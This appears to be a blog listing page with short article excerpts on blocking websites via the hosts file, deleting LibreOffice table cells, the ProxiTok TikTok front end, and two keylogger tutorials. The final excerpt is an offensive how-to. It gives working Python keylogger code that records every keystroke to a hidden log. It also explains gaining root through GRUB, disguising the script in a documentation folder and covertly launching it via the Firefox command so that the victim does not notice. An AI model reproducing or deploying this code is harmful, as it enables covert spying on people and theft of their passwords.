Block websites: hosts file

To block websites you can use a browser extension (such as Block Site), a proxy server (such as Squid), but there is also the option of editing the hosts file, a method that consumes very little RAM and, unlike the browser extension, will work for any browser or program Keep reading Block websites: hosts file

How to delete table cells in LibreOffice Writer

To delete cells the only option is removing its borders. Here I have a table from which I want to remove three of the top cells that are leftover:

To do this, click on the Borders button that appears below when we select the table cells we want to delete and then click on No Borders, as I do in the following image:

In case you get lost, here is also a video demonstration:

Here is the result:

TikTok privately with ProxiTok

TikTok is a centralised social network and requires the use of proprietary software. It is practically impossible to query TikTok with the browser in a decent way without losing privacy or freedom... unless you use another interface, such as ProxyTok, which I describe in this article.

The ProxiTok interface is simple. You can go to trending content, discover users and search by username, tag, TikTok URL, music identifier and video identifier.

Search by username
Profile of @a_commoner. It can also be followed by RSS.

The project was launched on 1 January 2022, so it is quite young and more features are expected to be added. To automatically redirect to ProxiTok you can install the LibRedirect extension, which also prevents other privacy-harmful websites.

There are several public instances, and it is possible to install one on your own server.

Python keylogger for GNU/Linux. Send information by email and self-destruct

In this article I show you how to program an advanced keylogger that sends messages by email and self-destructs after a certain date.

Keep reading Python keylogger for GNU/Linux. Send information by email and self-destruct

Basic keylogger for GNU/Linux to steal passwords and typed information

A simple way to steal passwords is to install a keylogger on the victim's computer. I am going to show how to do this on GNU/Linux using the Python programming language.

The first thing to do is to obtain superuser permissions. If the computer is managed by us, we already know the password. If not, we can get superuser access from GRUB. With the necessary permissions, we are free to install the keylogger.

First of all, the pynput library must be installed executing...

sudo pip install pynput

Next, we need to write the keylogger. This is the code we will use:

#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging

log_dir = "/usr/share/doc/python3/"

logging.basicConfig(filename=(log_dir + "log"), \
        level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

The keylog is stored in log_dir. In this case, I have specified the GNU/Linux Python 3 documentation folder. The keylogger can also be stored in the same directory, perhaps with the name compile_docs.py or something similar to avoid attracting attention. Ideally, choose a folder that the victim is not going to enter to prevent them from realising what we are doing.

The last step would be to run the program every time the computer is turned on or a program is started without the victim noticing. If, for example, we want to start the keylogger every time the user opens Firefox, we can modify the Firefox command. Keep reading Basic keylogger for GNU/Linux to steal passwords and typed information